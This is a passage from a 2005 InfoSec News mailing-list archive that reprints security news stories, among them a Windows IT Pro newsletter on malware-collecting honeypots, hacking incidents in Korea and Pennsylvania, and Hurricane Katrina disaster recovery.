From isn at c4i.org Thu Sep 1 05:16:19 2005 From: isn at c4i.org (InfoSec News) Date: Thu Sep 1 05:21:27 2005 Subject: [ISN] Security clearance delays still a problem Message-ID: http://www.fcw.com/article90542-08-31-05-Web Florence Olsen September 1, 2005 Security clearance delays are the same, if not worse, than a year ago, before lawmakers made changes designed to help clear the backlog, Information Technology Association of America officials said in a survey report released Aug. 31. Harris Miller, ITAA's president, said newly enacted reciprocity rules have made no dent in a problem that is creating mounting costs for high-tech companies. Those rules permit agencies to accept clearances initiated by other agencies. ITAA officials said 27 member companies that responded to a survey are coping with the backlog by hiring cleared employees from one another, sometimes paying premiums of up to 25 percent. Responding to a Web-based survey, 81 percent, or 21 companies, said they had encountered delays of 270 or more days in getting top-secret clearances for employees. Last year, when ITAA conducted a similar survey, 70 percent reported equally lengthy delays. The longest waits occurred in seeking clearances for employees to work at the CIA and the Defense Department. From isn at c4i.org Thu Sep 1 05:14:45 2005 From: isn at c4i.org (InfoSec News) Date: Thu Sep 1 05:21:55 2005 Subject: [ISN] Games hackers play Message-ID: http://star-techcentral.com/tech/story.asp?file=/2005/9/1/corpit/11909286&sec=corpit September 1, 2005 HACK In The Box (M) Sdn Bhd (HITB) is organising a two-day hacking competition during this year's HITB Security Conference (HITBSecConf 2005), which will take place from from Sept 26-29 at the Westin Hotel, Kuala Lumpur. Called "Capture The Flag" (CtF), the game originated from Defcon IV (www.defcon.org) in 1996, the largest underground hacking convention in the world. In the competition, each participating team (consisting of 2-3 persons) will be given a server to defend, and at the same time, they will launch penetrative attacks against other teams. "The competition tests a security administrator's ability to secure complex systems with unknown but required functionalities," said Meling Mudin, HITB senior security consultant. "The emphasis of the CtF game is on real-world skills and not just pure bred hacking skills," he said. This includes analysing the security posture of a system, finding and exploiting vulnerabilities, writing automated scripts, and keeping a running system alive while under massive attack, he explained. HITBSecConf is a non-profit, homegrown hacking and network security conference, and features hackers from Australia, Canada, Europe, the United States and Asia Pacific. Malaysia Airlines is the Official Airline Partner for this year's conference. According to Dhillon Andrew Kannabhiran, its founder and HITB chief executive officer, all participants in the CtF game are professional security consultants whose clients include banks and government bodies. "Participating in a CtF game is one of the best ways they can pit their skills against other hackers in a controlled environment," he said. "In previous years, we had participants from Brunei, Singapore and Malaysia," he said, adding that the winning team this year will walk away with a Mac Mini and other prizes. While the CtF is a team-based competition, solo hackers may participate in the Zone-H Hacking Challenge, also held during the HITBSecConf 2005. This challenge is an online hack game where participants are required to overcome three levels of increasing difficulty in a limited time using only a web browser. For more information and to sign up for HITBSecConf 2005, go to http://conference.hackinthebox.org From isn at c4i.org Thu Sep 1 05:14:58 2005 From: isn at c4i.org (InfoSec News) Date: Thu Sep 1 05:22:27 2005 Subject: [ISN] Hackers Declare Open Season on Korean Institutions Message-ID: http://english.chosun.com/w21data/html/news/200508/200508310029.html Aug. 31, 2005 When the website of a local Education Office was hacked in January, the hacker, who went in through a Chinese website, got hold of the phone numbers, IDs and PIN numbers of hundreds of members, and using them was able to take a peek at their e-mails. Posing as the website administrator, the hacker played havoc with the site, changing it as he pleased. The National Intelligence Service and National Cyber Security Center discovered that the man had hacked into some 170 local and foreign websites over a single year. Educational institutions are the preferred target of hackers, making up 52 percent of the 2,951 websites damaged in the first half of the year, according to government materials. Authorities are not saying whether any of the sites hacked this year are security-related, but last year 211 PCs at the Korea Institute for Defense Analyses, National Maritime Police Agency and Korea Atomic Energy Research Institute were accessed by persons unknown. Some of the terminals had defense secrets stored on them. Attempts to track down the culprits revealed that the hackers were very likely Chinese, but because of potential diplomatic consequences the government took no particular measures. Investigation shows that the computers of Korean public institutions are being hacked almost indiscriminately. This year??s 2,951 cyber-violations of public institutions were twice the total over the same period last year (1,482), and 74 percent of last year??s total of 3,970 incidents. Last year's total in turn was triple the number of 2003. National bodies, local governments, research institutes, educational institutions, government affiliates -- they are all increasingly fair game for hackers. An official with the Korea Information Security Agency says most incidents are perpetrated by skilled hackers through several avenues, ??and because investigative cooperation with states like China is not working properly, there are many cases where catching the hackers is impossible.?? The result is that authorities can only guess what information hackers got away with, he adds. From isn at c4i.org Thu Sep 1 05:16:51 2005 From: isn at c4i.org (InfoSec News) Date: Thu Sep 1 05:23:52 2005 Subject: [ISN] New Microsoft portal will help cops Message-ID: http://news.com.com/New+Microsoft+portal+will+help+cops/2100-7348_3-5845205.html By Joris Evers Staff Writer, CNET News.com August 31, 2005 MONTEREY, Calif. -- Expanding its efforts to help law enforcement with cybercrime investiga1tions, Microsoft plans in the coming months to launch a new online resource. The Web site will include training, tips and tools for investigations and information on cybercrime, Richard LaMagna, director of worldwide law enforcement programs at Microsoft, said in an interview with CNET News.com on Wednesday at the annual High Technology Crime Investigation Association event here. "We want to help law enforcement develop the capability to deal with these cybercrime problems," said LaMagna, a former federal agent. "We believe it is important for private industry to support law enforcement, particularly with cybercrime. It is not the kind of thing the FBI, NYPD or customs agents can do on their own." Microsoft's online training will include simple forensic skills--for example, guidance on digging up information on the hard drive of a seized Windows PC, and basic online investigation techniques such as trace routes and Whois domain database lookups, LaMagna said. "There are still a lot of law enforcement people out there who don't know how to trace an IP address or an Internet domain," he said. Other information on the Web site will include details on recent legislation. Microsoft also plans to offer specialized technical support to investigators. Microsoft already is active in helping law enforcement. For example, the company has hosted two multiday training sessions on botnets in the past year, one in the United States and one in Europe. A third session is scheduled for October at Microsoft's Redmond, Wash., campus, LaMagna said. Botnets are networks of hijacked computers that are typically used for criminal activity. Criminals have used botnets for sending spam, spreading malicious code, launching denial-of-service attacks and extortion attempts, according to security experts. Microsoft's new portal will offer a software tool to help detect botnets, LaMagna said. The "Law Enforcement Portal" also will have contact details for people within Microsoft who deal with requests from the authorities, LaMagna said. These could be requests for information on Hotmail users, for example, he said. Educating law enforcement is only part of Microsoft's efforts to fight cybercrime. The company also has its own team of about 50 investigators. Intelligence gathered by this "Internet Safety Enforcement" group has helped track down the suspected creators of the recent Zotob worm, among other cybercriminals. Microsoft also is active in fighting spammers in court. And it introduced a computer system designed to let police agencies share information for tracking online child predators. The new Law Enforcement Portal should be online by November, LaMagna said. The site will initially be in English only, but there are plans to translate it into other languages. Access will be limited to law enforcement officials. From isn at c4i.org Thu Sep 1 05:17:06 2005 From: isn at c4i.org (InfoSec News) Date: Thu Sep 1 05:24:18 2005 Subject: [ISN] Expert charged in computer hacking Message-ID: http://pittsburghlive.com/x/tribune-review/trib/pittsburgh/s_369618.html By Violet Law TRIBUNE-REVIEW September 1, 2005 A computer networking consultant hacked into a Beaver County school district's system to peek at a competitor's bids, but didn't escape without leaving tracks, police said Wednesday. Police charged Brooks M. Roy, 25, of Cranberry, with breaking into the e-mail system he helped design and install for the South Side Beaver School District. Roy admitted to police that he hacked into the system from his home computer, retrieving confidential bids filed by a competitor, according to court documents. Roy worked on the district's system for Communications Consulting Inc., a New Sewickley, Beaver County, information technology firm. He was still with the company at the time of the break-in, and still had a voice mail account in the firm's phone system yesterday. According to court records: The district's technology coordinator, Thomas Sherry, discovered in May that someone had logged into the district's e-mail server and accessed his e-mail without authorization. Police said they tracked Roy down using his IP address, a numeric address given to a computer connected to the Internet. Attempts to contact Roy, Communications Consulting and school officials were unsuccessful. Roy does computer work for more than one district, but authorities were not aware of his hacking into other schools' systems, said state police Cpl. John Stephansky, who investigated the case. Police rely on reports from people such as Sherry to track down computer crimes, he said. Ambridge School District technology director James LaSalle praised both Roy's work and his ethics. LaSalle said he has known Roy for about eight years, and contracted with Communications Consulting for data and voice networking. "I think his ethics and his professional conduct are beyond reproach. He's top shelf," LaSalle said. "I have no reason to question their service or integrity." Communications Consulting's Web site says the company "specializes in the design, sales and service of communications systems for data, voice and video networks." Roy was arraigned yesterday before Cranberry District Judge Kelly Streib and released on his own recognizance. He is charged with computer trespass, criminal use of a communication facility and unlawful use of computers. From isn at c4i.org Thu Sep 1 05:15:51 2005 From: isn at c4i.org (InfoSec News) Date: Thu Sep 1 05:24:53 2005 Subject: [ISN] Security UPDATE -- Honeypots That Collect Malware -- August 31, 2005 Message-ID: ==================== This email newsletter comes to you free and is supported by the following advertisers, which offer products and services in which you might be interested. Please take a moment to visit these advertisers' Web sites and show your support for Security UPDATE. A Robust Combination from Symantec http://list.windowsitpro.com/t?ctl=12651:4FB69 How to solve the anti-spam dilemma http://list.windowsitpro.com/t?ctl=1263A:4FB69 ==================== 1. In Focus: Honeypots That Collect Malware 2. Security News and Features - Recent Security Vulnerabilities - Vulnerabilities in PHP-based Libraries - Secure Computing to Acquire CyberGuard - EarthLink to Acquire Security Solutions Maker Aluria Software 3. Security Toolkit - Security Matters Blog - FAQ 4. New and Improved - Pocket PC File Encryption ==================== ==== Sponsor: Symantec ==== A Robust Combination from Symantec Staying on top of today's vulnerabilities and threats is one of the most difficult, time-consuming, and even risky tasks facing IT professionals like you. Never has it been so important to proactively manage your IT environment. Fortunately, Symantec can help. Symantec LiveState Patch Manager 6.0 helps keep your enterprise devices secure and available by identifying known vulnerabilities and then installing necessary patches on hundreds of systems in minutes, not hours. That includes mobile and remote devices, too. For extra protection from threats that even the latest patches can't address, there's Symantec Client Security 3.0. With its exclusive intrusion prevention technology, Symantec Client Security 3.0 proactively protects systems against known and unknown exploits before they can compromise your system, including spyware, adware, viruses, and other malicious intrusions. Learn more at http://list.windowsitpro.com/t?ctl=12651:4FB69 ==================== ==== 1. In Focus: Honeypots That Collect Malware ==== by Mark Joseph Edwards, News Editor, mark at ntsecurity / net The last two weeks, I've written about proactive honeypots that seek out malicious Web sites, two of which are unavailable to the public and one that you can download to run on your own networks. If you missed either of those articles, they're available on our Web site at the URLs below. This week, I'll discuss two "passive" honeypots--that is, honeypots that sit waiting for intrusion attempts. http://list.windowsitpro.com/t?ctl=1264A:4FB69 http://list.windowsitpro.com/t?ctl=12649:4FB69 Because honeypots present an attack point for potential intruders, they're useful in determining what sort of intrusion attempts are being launched against your network. In some cases, they can detect intrusion methods that are completely unknown to even the most up-to-date Intrusion Detection Systems (IDSs). I recently learned about two new honeypots. The first is mwcollect (at the URL below), which was released in April 2005 and is partially funded by The Honeynet Project. Mwcollect is designed specifically to collect malware--thus the "mw" prefix in the mwcollect name. The tool runs on Linux and OpenBSD and can also run on Cygwin, a Linux environment that runs on Windows platforms. http://list.windowsitpro.com/t?ctl=12653:4FB69 Mwcollect is a little different from typical honeypots because it was originally designed to collect bot software, but the current version collects worms and other forms of malware that take advantage of vulnerabilities that mwcollect exposes. According to the mwcollect Web site, systems that run the tool can't be infected with malware due to the way mwcollect operates internally. It binds to specified ports, waits for an exploit attempt, scans for shell code, and tries to download any related malware. Captured malware can then be added to a database at the mwcollect Web site. The next version of mwcollect will allow three levels of network interactivity. The first level is the same as I describe above. The second level will passively analyze network traffic (like a sniffer in promiscuous mode would) and will try to download any related malware. The third or lowest level of interactivity will also passively analyze network traffic but won't try to download related malware. You can learn a little more about the tool at the Web site, and join in an Internet Relay Chat (IRC) for further discussion. The second new honeypot, Nepenthes, was released earlier this month and is similar to mwcollect. It too presents known vulnerabilities to the network and waits for intrusion attempts. Current modules for Nepenthes allow it to emulate problems with DCOM, Local Security Authority Service (LSASS), WINS, ASN1, NetBIOS, SQL Server, and a lot more Microsoft services. Because Nepenthes runs on Linux systems, none of those services would actually be available, which means exploits against them would have little or no effect on the underlying OS. Just like mwcollect, when Nepenthes detects intrusion attempts, it tries to download any related malware through a variety of methods including FTP, Trivial FTP (TFTP), and HTTP. Captured malware is then sent to a center server hosted by the developers of the tool. http://list.windowsitpro.com/t?ctl=12652:4FB69 Documentation for Nepenthes doesn't explain what goes on under the hood. But as best I can determine (I haven't actually installed the tool yet), it captures shell-code exploits; looks for instructions that try to download code from the Internet (which many types of malware have); and if it finds such instructions, proceeds to try to download the malware in accordance with the intruder's intent--for example, if the captured code indicates that the system should use FTP to download a file, Nepenthes will try to do that. I suspect that mwcollect works in a similar fashion. Nepenthes doesn't appear to run on Windows platforms using Cygwin, so you'll probably need a Linux-based system to put it to use on your networks. If you use honeypots as do so many administrators these days, be sure to take a closer look at mwcollect and Nepenthes. ----- We need your help! Windows IT Pro is launching its second Windows IT Pro Industry Salary Survey, and we want to find out all about you and what makes you a satisfied IT pro. When you complete the survey (about 10 minutes of your time), you'll be entered in a drawing for one of two $300 American Express gift certificates. Look for the survey results-- and see how you stack up against your peers--in our December issue. To take the survey, go to http://list.windowsitpro.com/t?ctl=12646:4FB69 ==================== ==== Sponsor: Postini ==== How to solve the anti-spam dilemma In this free white paper learn why older spam prevention technologies using traditional content filtering don't work against the latest spammer tactics - and why more corporate email administrators are turning to a more accurate, more effective approach: managed email security service. Find out how to achieve email security dynamically with multiple layer protection ... minimize false positives ... cut email administration costs (and hassles) ... and keep user communities happy and productive. Download your free copy now. http://list.windowsitpro.com/t?ctl=1263A:4FB69 ==================== ==== 2. Security News and Features ==== Recent Security Vulnerabilities If you subscribe to this newsletter, you also receive Security Alerts, which inform you about recently discovered security vulnerabilities. You can also find information about these discoveries at http://list.windowsitpro.com/t?ctl=12641:4FB69 Vulnerabilities in PHP-based Libraries Major security problems in two popular Hypertext Preprocessor (PHP)- based libraries have led to complete removal of a particular programming function in those libraries. In June, problems were discovered in libraries that provide PHP-based support for XML and RPC, both of which are used by many applications today, including hugely popular blog software packages. A subsequent code audit revealed still more vulnerabilities. http://list.windowsitpro.com/t?ctl=12647:4FB69 Secure Computing to Acquire CyberGuard Secure Computing announced that it will acquire CyberGuard. Under the terms of the deal, Secure Computing will acquire all outstanding shares of CyberGuard common stock and in turn give shares of its common stock, as well as cash, to CyberGuard stockholders. http://list.windowsitpro.com/t?ctl=1264C:4FB69 EarthLink to Acquire Security Solutions Maker Aluria Software EarthLink and Aluria Software announced a deal in which EarthLink will acquire the assets of Aluria, makers of the Spyware Eliminator software. Terms of the deal, expected to close in September, weren't announced. http://list.windowsitpro.com/t?ctl=1264D:4FB69 ==================== ==== Resources and Events ==== SQL Server 2005 Roadshow Is Coming to a City Near You Get the facts about migrating to SQL Server 2005. SQL Server experts will present real-world information about administration, development, and business intelligence to help you implement a best-practices migration to SQL Server 2005 and improve your database computing environment. Attend and receive a 1-year membership to PASS and 1-year subscription to SQL Server Magazine. Register now! http://list.windowsitpro.com/t?ctl=1263F:4FB69 Consolidate Your SQL Server Infrastructure Shared data clustering is the breakthrough consolidation solution for Microsoft Windows servers. In this free Web seminar, learn how shared data clustering technology can reduce capital expenditures by at least 50 percent, improve management efficiency, reduce operational expense, ensure high availability across all SQL Server instances, and more! Find out how you can reduce the overall Total Cost of Ownership (TCO) for SQL Server cluster deployments by as much as 60 percent over three years! Sign up today! http://list.windowsitpro.com/t?ctl=1263B:4FB69 High Risk Internet Access: Are You in Control? Defending against Internet criminals, spyware, and phishing and addressing the points of risk that Internet-enabled applications expose your organization to can seem like an epic battle with Medusa. So how do you take control of these valuable resources? In this free Web seminar, you'll get the tools you need to help you analyze the impact Internet-based threats have on your organization and tools to aid you in the construction of Acceptable-Use Policies (AUPs). http://list.windowsitpro.com/t?ctl=1263E:4FB69 Get Ready for SQL Server 2005 Roadshow in Europe Back by popular demand--Get the facts about migrating to SQL Server 2005! SQL Server experts will present real-world information about administration, development, and business intelligence to help you implement a best-practices migration to SQL Server 2005 and improve your database-computing environment. Receive a 1-year membership to PASS and 1-year subscription to SQL Server Magazine. Register now! http://list.windowsitpro.com/t?ctl=1263D:4FB69 Discover SQL Server 2005 for the enterprise. Are you prepared? In this free, half-day event, you'll learn how the top new features of SQL Server 2005 will help you create and manage large-scale, mission-critical, enterprise database applications--making your job easier. Find out how to leverage SQL Server 2005's new capabilities to best support your business initiatives. Register today! http://list.windowsitpro.com/t?ctl=12640:4FB69 All high availability solutions are not created equal--how does yours measure up? In this free Web seminar, you'll get the tools you need to ensure your systems aren't going down. You'll discover the various categories of high availability and disaster recovery solutions available and the pros and cons of each. You'll learn what solutions help you take preemptive, corrective action without resorting to a full system failover, or in extreme cases, that perform a nondisruptive, automatic switchover to a secondary server. http://list.windowsitpro.com/t?ctl=1263C:4FB69 ==================== ==== Featured White Paper ==== The Impact of Disk Defragmentation Nearly every IT professional has a fragmentation horror story--in which fragmentation severely degraded performance so that systems were unusable. In this free white paper, learn what impact fragmentation has on users and system activities and discover how quickly fragmentation accumulates as a result of these activities. Plus get the recommendations you need to manage the frequency of defragmentation across your infrastructure. http://list.windowsitpro.com/t?ctl=12639:4FB69 ==================== ==== 3. Security Toolkit ==== Security Matters Blog: Wi-Fi Security Is Better Than I Expected by Mark Joseph Edwards, http://list.windowsitpro.com/t?ctl=1264F:4FB69 There's a lot of talk about the need for increased Wi-Fi security. I was surprised at what I found when I did a little "war driving" in my area. http://list.windowsitpro.com/t?ctl=12648:4FB69 FAQ by John Savill, http://list.windowsitpro.com/t?ctl=1264E:4FB69 Q: I created a custom .adm file and imported it into a Group Policy Object's (GPO's) Administrative Templates. Why can't I see any of the settings in Group Policy Editor (GPE)? Find the answer at http://list.windowsitpro.com/t?ctl=1264B:4FB69 ==================== ==== Announcements ==== (from Windows IT Pro and its partners) Stay Up-To-Date with the Windows IT Security Newsletter Each new issue of the Windows IT Security newsletter features related product coverage of the best security tools available and expert advice on the best way to implement various security components. We've also expanded our security content to include even more fundamentals on building and maintaining a secure enterprise. In addition, paid subscribers get online access to our entire online security article database (over 1900 articles)! Subscribe today: http://list.windowsitpro.com/t?ctl=12643:4FB69 VIP Monthly Online Pass = Quick Security Answers! Sign up today for your VIP Monthly Online Pass and get 24/7 access to the entire online article database, including exclusive, subscriber- only Windows IT Security newsletter content. That's a database of over 1900 security articles to help you get all the answers you need, when you need them. Sign up now: http://list.windowsitpro.com/t?ctl=12644:4FB69 ==================== ==== 4. New and Improved ==== by Renee Munshi, products@windowsitpro.com Pocket PC File Encryption Infotecs offers ViPNet Safe Disk for Pocket PC, which encrypts and password-protects sensitive files on PDAs. Data is protected even when the device is switched off or in standby mode. You can open and edit any file from a secure folder in a word processor or database program-- the file is automatically decrypted when opened and encrypted when saved. ViPNet Safe Disk for Pocket PC supports two 256-bit encryption algorithms: Advanced Encryption Standard (AES) and Government Standard (GOST). The interface is specially designed to help PDA users manage protected files and folders with just a few taps. You can exchange protected data with a PC that's running ViPNet Safe Disk. ViPNet Safe Disk for Pocket PC runs under Windows Mobile 2003 and costs $26.40 for a single-user license. For more information, go to http://list.windowsitpro.com/t?ctl=12654:4FB69 Tell Us About a Hot Product and Get a T-Shirt! Have you used a product that changed your IT experience by saving you time or easing your daily burden? Tell us about the product, and we'll send you a T-shirt if we write about the product in a future Windows IT Pro What's Hot column. Send your product suggestions with information about how the product has helped you to whatshot@windowsitpro.com. Editor's note: Share Your Security Discoveries and Get $100 Share your security-related discoveries, comments, or problems and solutions in the Windows IT Security print newsletter's Reader to Reader column. Email your contributions (500 words or less) to r2rwinitsec@windowsitpro.com. If we print your submission, you'll get $100. We edit submissions for style, grammar, and length. ==================== ==== Sponsored Links ==== Professional and secure remote control from all major platforms http://list.windowsitpro.com/t?ctl=12637:4FB69 Argent Versus MOM 2005 Experts Pick the Best Windows Monitoring Solution http://list.windowsitpro.com/t?ctl=12636:4FB69 Tech jobs at Dice Search 65K+ new IT jobs daily--Tech expert jobs at top companies! http://list.windowsitpro.com/t?ctl=12638:4FB69 ==================== ==== Contact Us ==== About the newsletter -- letters@windowsitpro.com About technical questions -- http://list.windowsitpro.com/t?ctl=12650:4FB69 About product news -- products@windowsitpro.com About your subscription -- windowsitproupdate@windowsitpro.com About sponsoring Security UPDATE -- salesopps@windowsitpro.com ==================== This email newsletter is brought to you by Windows IT Security, the leading publication for IT professionals securing the Windows enterprise from external intruders and controlling access for internal users. Subscribe today. http://list.windowsitpro.com/t?ctl=12645:4FB69 View the Windows IT Pro privacy policy at http://www.windowsitpro.com/AboutUs/Index.cfm?action=privacy Windows IT Pro, a division of Penton Media, Inc. 221 East 29th Street, Loveland, CO 80538 Attention: Customer Service Department Copyright 2005, Penton Media, Inc. All rights reserved. From isn at c4i.org Thu Sep 1 05:16:07 2005 From: isn at c4i.org (InfoSec News) Date: Thu Sep 1 05:27:53 2005 Subject: [ISN] Amid Katrina chaos, one company struggles to keep going Message-ID: http://www.computerworld.com/securitytopics/security/recovery/story/0,10801,104291,00.html By Marc L. Songini AUGUST 31, 2005 COMPUTERWORLD As floodwaters continued to flow into New Orleans today and officials in the Gulf states predicted a death toll from Hurricane Katrina that could reach into the thousands, companies that were forced to evacuate by the storm struggled to get their operations up and running elsewhere. Among those scrambling to stay in business is Integrated Data Systems Inc., a New Orleans-based integrator and hosting services provider. "I don't think anyone has ever coped with anything like this before. The magnitude is pretty enormous," said Robert Leithman, president of Integrated Data Systems. Leithman -- who left the city along with most of its residents ahead of the storm -- said by cell phone that he and his staff are in the process of getting his customers back online. The 18-person company, which has backup facilities in several cities in the U.S., now has basic Web access, instant messaging and Hotmail e-mail capabilities and is looking to get the back-office systems of its customers live. Among those companies is New Orleans-based Tabasco sauce maker McIlhenny Co., for which Integrated Data Systems set up a temporary Web site for customers and e-mail access for employees. "We've got them ripping along right now," Leithman said today. "Things are far from being back to normal, but at least were getting the semblance of it." The main problem for companies in the region is that connectivity and telecommunications are down. "Even with a good plan, which we had, there were still some things we didn't expect, [such] the lack of the ability to communicate." After Katrina hit the Louisiana, Mississippi and Alabama coasts on Monday, communications virtually ceased. While some cell phone users were able to make outgoing calls, they couldn't receive calls. That forced company employees to buy prepaid cell phone cards for incoming messages. Even before the storm approached Integrated Data Systems had disaster recovery plans in place, with procedures based on lessons learned after the Sept. 11, 2001, terrorist attacks. Among those lessons: Make sure company assets and hardware are distributed geographically. The 9/11 attacks taught the company, for instance, to have its backup tapes located in different places, Leithman said. "This was not as shocking [as 911], but it's a lot larger in scope and size," he said. One of the company's hosting centers -- near the stricken New Orleans Superdome, where refugees took shelter from the hurricane -- is inaccessible. Another, located in a bunker in nearby Metairie, La., is live -- but still lacks connectivity, said Leithman. He plans to have it checked on, but to communicate via phone requires driving miles away to get a line. "Even the best-laid plans go awry really quick," said Leithman, who had to leave for Florida on Saturday. The trip, which normally takes about five hours, took 15 as residents of the area fled the approaching storm. Not everyone at Integrated Data Systems was able to get far enough away from the storm. Leithman noted that one company engineer, who thought he was safe in a location that would be "high and dry," had his roof ripped off. "The most interesting thing about the process is [that] first, people are in shock," said Leithman. "Their houses are gone, their lives torn up, and they're worried about their families and things they should be worried about. Then they come out and say, 'I have to have a job, and what do I do?' We're able to help them. In the meantime, we're not thinking of ourselves. It's helpful not have time to think about it." And even as people struggle to come to grips with what has happened in and around New Orleans, Leithman said he is already looking ahead -- trying to learn the lessons from the ongoing disaster. Next time, for instance, he said he plans to buy satellite phones to ensure that communications remain in place. During an earlier hurricane, Integrated Data Systems had rented satellite phones at the last minute. Katrina didn't give the company time to get them. "I promise to own them next time around. They'll be in our possession," he said. Elsewhere in the region, companies such as Harrah's Entertainment Inc., which had three casinos in the region -- one in New Orleans, one in Biloxi, Miss., and one in Gulfport, Miss. -- shut down operations last weekend. In doing so, the Las Vegas-based gaming company moved processing for several key systems from a regional data center in Biloxi to primary data centers in Tennessee and New Jersey, said Tim Stanley, senior vice president and CIO at Harrah's. Systems that were rerouted include hotel, casino, events, ticketing and convention systems, reservations and VIP call centers, the IT help desk, regional data and file servers, e-mail servers, and some network and routing infrastructure, said Stanley. Back-office operations such as finance and human resources were already centralized in New Jersey or in Nevada. The company also has a variety of systems located at the affected properties that can't be operated remotely, including slot and table game systems, sports books, point-of-sale systems, local telephony, security and desktop systems -- "not that those really matter, as the properties are not open," said Stanley. He added that they aren't expected to reopen "for some time." Tom Hoffman contributed to this report. From isn at c4i.org Thu Sep 1 05:16:37 2005 From: isn at c4i.org (InfoSec News) Date: Thu Sep 1 05:28:18 2005 Subject: [ISN] The truth about security Message-ID: http://www.globetechnology.com/servlet/story/RTGAM.20050826.gtkirwanaug26/BNStory/Technology/ By MARY KIRWAN August 31, 2005 Special to Globe and Mail Update Mutton dressed as lamb? Are software products riddled with holes? Truth is often stranger than fiction, and never more so than in the world of IT security. The recent BlackHat security event in Las Vegas was a case in point, becoming the stage for a bizarre series of events. Bemused attendees watched as Cisco and Internet Security Systems Inc. (ISS) tried to stop Michael Lynn, an ISS employee, from giving his scheduled talk on critical vulnerabilities in Cisco routers. Routers move data around the Internet, and Cisco owns the market for them. It has generally been assumed- naively so- that they are impervious to attack, so news that they are not is very bad news indeed. These less than glad tidings, however dispiriting, would rarely qualify as front page news. But Cisco and ISS demurred. They secured an injunction to prevent Lynn from giving his talk, and his presentation was ripped from conference binders. The newly martyred Lynn duly quit his job at ISS, sallied forth and delivered his speech anyway, causing a veritable ruckus. The entire affair was quickly dubbed 'Ciscogate', and made news around the world. It also drew attention to a disquieting global trend that is gathering momentum. Software vendors are using copyright and trade secret laws to prevent researchers from revealing critical flaws in software products. For instance, in March 2005, Guillame Tena, a French researcher in molecular biology in the department of Genetics at Harvard University, received a hefty fine from a French court and narrowly escaped jail time for revealing flaws in a Tegam International anti-virus product that was advertised as being capable of detecting and stopping "100 per cent of viruses." He was prosecuted under the French Intellectual Property Code for counterfeiting. Tegam also seeks damages of 900,000 euros in a civil lawsuit - it considers Tena a software 'pirate' who defamed the company. But does muzzling security researchers improve software quality and security? Or, as software vendors have no liability to customers for flaws, will such action simply serve to hide a festering problem under a rather large bushel? Politicians mandated with protecting us and the global economy in dangerous times ought take note. As more than 85 per cent of "critical infrastructure"- a phrase used to refer to critical sectors, such as telecommunication providers, utilities, and the financial services sector - is in private industry's hands and hugely dependent on technology, more needs to be done to ensure its survivability. Vendors argue that researchers who expose software flaws are often less than pure of heart; that they threaten and cajole them to get publicity and lucrative contracts. Vendors also maintain that developing and testing patches takes time, and that customers expect researchers to give vendors time to address problems before releasing exploit code into the wild. However, it can be months before patches are released, and they are oftentimes only available to customers running the latest version of a piece software - a tactic that encourages upgrades. In addition, vendors derive revenue from patch management services. Meanwhile, many legitimate researchers are running scared, and opting to co-operate with vendors in return for their largesse and approval. So where does this leave us? Can we at least rely on security software to keep us safe? Alas, not as a matter of course. In recent years, the US Federal Trade Commission (FTC) has reprimanded companies, including Microsoft, Guess and Tower Records, for misrepresenting the effectiveness of their security practices. Security product vendors have received similar heat for making false or misleading claims about their products to the public. For example, the FTC recently got a temporary injunction and asset freezing order against Trustsoft, a Texas based company, accusing it of misleading and deceptive advertising, and of spamming consumers, pursuant to the US CAN-SPAM Act. According to the FTC, Trustsoft falsely misrepresented to consumers that its software had scanned their PCs, and located spyware. It used "frightening pop-ups" to try to persuade people to purchase their product to remove spyware ? a task it was not in fact capable of performing. The FTC alleged that the supposed scans completed on consumers' PCs were 'nothing more than computer graphics that have no computer scanning capabilities'. Even hardware vendors are not immune. Advanced Micro Devices (AMD), the computer chip manufacturer, was recently called to task by Dutch regulators for advertising a new chip as a way to prevent virus outbreaks in the Netherlands. A complaint was made to the Dutch consumer commission about an AMD radio advertisement in Holland that apparently stated that the new AMD64 processor would ensure people would "no longer have to worry about viruses". Reports indicate that the regulator found that some of the radio ads were "too absolute and as a result misleading." In June 2005, Lorrie Cranor, Associate Research Professor at the Institute for Software Research at Carnegie Mellon University, presented the disquieting result of research carried out by her team. They examined the performance of six commercial privacy tools, marketed as capable of permanently wiping data from computers to protect data privacy. The researchers were able in most cases to recover sensitive data; files were not properly overwritten, and in one cases, the product tested 'completely failed' to do anything useful. Users of such products were clearly left with a false sense of security that their data had been successfully erased. The vendors were contacted by the researchers, and the vast majority failed to respond. Unfortunately, flaws in security products are nothing new. Indeed, The Yankee Group research company has recently indicated that the security industry needs to pull up its socks in a big way, since the number of vulnerabilities in products that are supposed to protect us continue to escalate at an alarming rate. All this is to say that as long as vendors are impervious to entreaty and immune from legal liability, corporate customers should, where possible, take matters into their own hands and employ a wide range of defensive measures to make it harder for hackers to access vulnerable systems. The speed at which the recent Zotob worm hit several Canadian banks and media outlets in the U.S., such as CNN, ABC, and the New York Times, has convinced many experts that "there is no more patch window." That worm exploits a security hole in the plug-and-play feature of the Windows 2000 operating system. Microsoft had released a patch for the bug as part of its monthly patching cycle shortly before the outbreak, but new exploits emerged within three days of the patch release, before many machines had been updated with the security fix. Johannes Ullrich, chief research officer at the SANS Internet Storm Center, in one of the security group's daily alerts, advised companies to rely on "defense in depth" strategies to "survive the early release of malware." In other words, the bad guys are out manoeuvring the security vendors, and it is every man for himself. Government and big business may have the resources and political clout to take matters into their own hands, and/or to make vendors sit up and take note, but the consumer does not. What can he/she expect by way of protection? There are indications that the FTC in the U.S. is taking a hard look at claims made by vendors who market consumer products ? and that they are determined to at least hold them to the truth of publicly made assertions about them. Can we expect the Competition Bureau in Canada to follow suit? Vendors surely cannot be expected to have their cake and eat it too. From isn at c4i.org Fri Sep 2 06:49:20 2005 From: isn at c4i.org (InfoSec News) Date: Fri Sep 2 06:53:25 2005 Subject: [ISN] Telecoms face 'one big mess' in Gulf Coast region Message-ID: http://www.computerworld.com/securitytopics/security/recovery/story/0,10801,104324,00.html By Matt Hamblen SEPTEMBER 01, 2005 COMPUTERWORLD Cellular and other communication services are gradually improving in the Gulf Coast region more than three days after Hurricane Katrina blasted through, but service providers said today they still can't reach equipment in the flooded city of New Orleans to make needed repairs. Officials at Cingular Wireless LLC, Verizon Wireless, Sprint Corp. and BellSouth Corp. reported separately at noon today that with flooding and power outages in New Orleans, crews can't access cellular sites and switching stations for repairs. Sprint?s crews are waiting in Baton Rouge, La., until officials say it's safe to enter New Orleans, a spokesman said. Telecommunications have improved, however, in places such as Baton Rouge, Mobile, Ala. and Pensacola, Fla., company spokesmen said in separate interviews. The carriers are all relying on backup generators and in some cases portable generators and cellular transceivers carried on panel trucks. When possible, the carriers are also increasing power to rooftop cell sites in New Orleans to boost signals, the spokesmen said. Despite a massive effort with thousands of repair workers on the scene, the situation is obviously 